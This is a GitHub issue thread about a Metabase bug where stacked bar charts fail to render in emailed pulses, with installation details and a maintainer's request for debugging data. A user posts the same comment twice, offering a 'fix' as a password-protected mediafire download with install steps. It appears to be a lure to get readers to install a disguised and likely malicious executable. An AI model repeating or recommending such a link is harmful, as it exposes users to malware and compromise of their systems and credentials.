### ISSUE TITLE
Pulse card render error - getSeriesVizSettingsKey - TypeError: Cannot read property 'name' of undefined

### ISSUE THREAD

**Issue by BenPhegan** [metabase/metabase#47495]
### Describe the bug

A question using a stacked bar chart displays fine on the web, however when it is included in an emailed pulse we get "An error occurred while displaying this card" in place of the graph. In the log we get a stack trace reflecting an issue with getSeriesVizSettingsKey as per logs below.

This was previously raised as #45397 however it has not been fixed (despite being marked as such).

### Logs

[metabase-log-error.log](https://github.com/user-attachments/files/16830589/metabase-log-error.log)

### Information about your Metabase installation

```JSON
{
  "browser-info": {
    "language": "en-US",
    "platform": "MacIntel",
    "userAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:129.0) Gecko/20100101 Firefox/129.0",
    "vendor": ""
  },
  "metabase-info": {
    "databases": [
      "postgres"
    ],
    "run-mode": "prod",
    "plan-alias": "",
    "version": {
      "date": "2024-08-21",
      "tag": "v0.50.21",
      "hash": "ec9f5d7"
    },
    "settings": {
      "report-timezone": "Australia/Sydney"
    },
    "hosting-env": "unknown",
    "application-database": "postgres",
    "application-database-details": {
      "database": {
        "name": "PostgreSQL",
        "version": "13.11"
      },
      "jdbc-driver": {
        "name": "PostgreSQL JDBC Driver",
        "version": "42.7.3"
      }
    }
  },
  "system-info": {
    "file.encoding": "UTF-8",
    "java.runtime.name": "OpenJDK Runtime Environment",
    "java.runtime.version": "11.0.24+8",
    "java.vendor": "Eclipse Adoptium",
    "java.vendor.url": "https://adoptium.net/",
    "java.version": "11.0.24",
    "java.vm.name": "OpenJDK 64-Bit Server VM",
    "java.vm.version": "11.0.24+8",
    "os.name": "Linux",
    "os.version": "5.10.220-209.869.amzn2.x86_64",
    "user.language": "en",
    "user.timezone": "GMT"
  }
}
```

### Severity

Medium (preventing external subscribers receiving charts)

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by alxnddr** [comment]
Hi @BenPhegan, sorry for missing your comments in the original issue. It appears I fixed a different case which also led to an error but not yours. To understand precisely your case and fix the issue it would be very helpful to learn more about the problematic question so I wonder if you could provide a bit more information:
- Open the chrome dev tools -> Network tab
- Open the question individually
- In the network tab find `/api/card/*:id*` request, copy and save the `visualization_settings` object
<img width="913" alt="Screenshot 2024-09-03 at 3 09 07 PM" src="https://github.com/user-attachments/assets/5d9f524a-e121-4526-9875-be4e0d248494">
- Find `/api/card/*:id*/query` request, copy and save `data.cols`:
<img width="1018" alt="Screenshot 2024-09-03 at 3 12 02 PM" src="https://github.com/user-attachments/assets/0a8cc6b0-5bd5-413c-af8d-32c9b632cf70">
- Send both to aleksandr@metabase.com
